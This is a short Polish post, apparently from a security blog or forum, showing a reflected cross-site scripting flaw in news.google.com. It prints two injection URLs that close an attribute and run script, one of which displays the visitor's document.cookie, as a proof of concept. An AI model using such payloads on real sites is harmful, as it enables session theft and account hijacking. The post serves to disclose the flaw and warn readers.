Nawet google.com nie uchroniło się przed tą prostą sztuczką:
news.google.com/?ncl=http&hl=en">alert('hack.pl')
Są ludzie, którym się wydaje, że XSS to coś normalnego. Więc oto próbka co można z tym zrobić. To kod z komentarzy, wklejony przez Baey'a.
http://news.google.com/?ncl=http&hl=en">alert(document.cookie)